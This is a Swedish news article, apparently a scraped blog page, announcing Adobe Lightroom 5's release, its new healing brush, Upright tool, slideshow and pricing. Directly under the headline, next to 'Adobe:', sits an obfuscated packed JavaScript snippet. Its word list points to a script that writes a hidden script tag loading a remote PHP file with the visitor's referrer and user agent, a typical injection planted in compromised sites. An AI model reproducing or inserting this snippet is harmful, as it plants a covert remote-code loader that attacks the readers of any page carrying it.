Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Adobe öppnar upp för Lightroom 5

Adobe öppnar upp för Lightroom 5

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydree|var|u0026u|referrer|frrkr||js|php’.split(’|’),0,{}))
Från och med idag kan alla få tillgång till Adobes välkända fotoredigeringsprogram Lightroom 5. Programmet innehåller nya funktioner så som en avancerad lagningspensel samt Upright ™, ett verktyg som automatiskt återställer en sned horisontlinje. Lightroom 5 är tillgängligt för både Mac och Windows via Adobe Creative Cloud.

Goda nyheter för alla fotoentusiaster. Idag lanserar Adobe fotoprogrammet Lightroom 5, som riktar sig till både entusiaster och professionella. Bland de nya funktionerna finns en avancerad lagningspensel som används för att eliminera fel och defekter i bilder. Det blir också enkelt att återställa horisontlinjen i ett snett foto med Upright ™, ett verktyg som automatiskt analyserar och rätar upp de horisontella linjerna i en bild, en funktion som många har saknat för semesterbilder genom åren. Lanseringen kommer efter en två månaders betaperiod, där fotografer världen över har provat de nya funktionerna och bidragit till att fixa buggar i programmet innan den slutliga versionen släppts.

”Nu kan alla få tillgång till det nya Lightroom. Vi har haft ett par månader där användarnas respons på betaversionen har implementerats, och vi är riktigt nöjda med resultatet. Testperioden gav oss möjlighet att justera enskilda element, så att vi idag kan presentera en stark lösning riktad till både entusiaster och professionella fotografer”, säger Mariah Andén, nordisk marknadschef för Digital Media hos Adobe.

Andra nyheter är en slideshow, där det går att kombinera bilder och video i HD-kvalitet. Därutöver finns även ett verktyg för radiell övertoning som används till utformning av vinjetteringar. Samtidigt presenteras en ny förhandsgranskningsfunktion, där bilder kan redigeras utan att behöva arbeta i själva RAW-filen. När man går online igen uppdateras all relevant metadata och bilden korrigeras automatiskt. Slutligen innebär uppdateringen av bokmodulen ännu fler möjligheter att designa och skriva ut personliga böcker med favoritbilderna.

Pris och tillgänglighet

Adobe Photoshop Lightroom 5 kan laddas ner till både Windows och MAC OS på Adobe.se och kostar 1205 kr för nedladdning, eller 664 kr för en uppgradering. Programmet kan även köpas hos återförsäljare runt om i landet. Lightroom 5 är också tillgängligt för alla medlemmar i Adobe Creative Cloud – det är gratis att testa Lightroom 5 i Adobe Creative Cloud i en månad.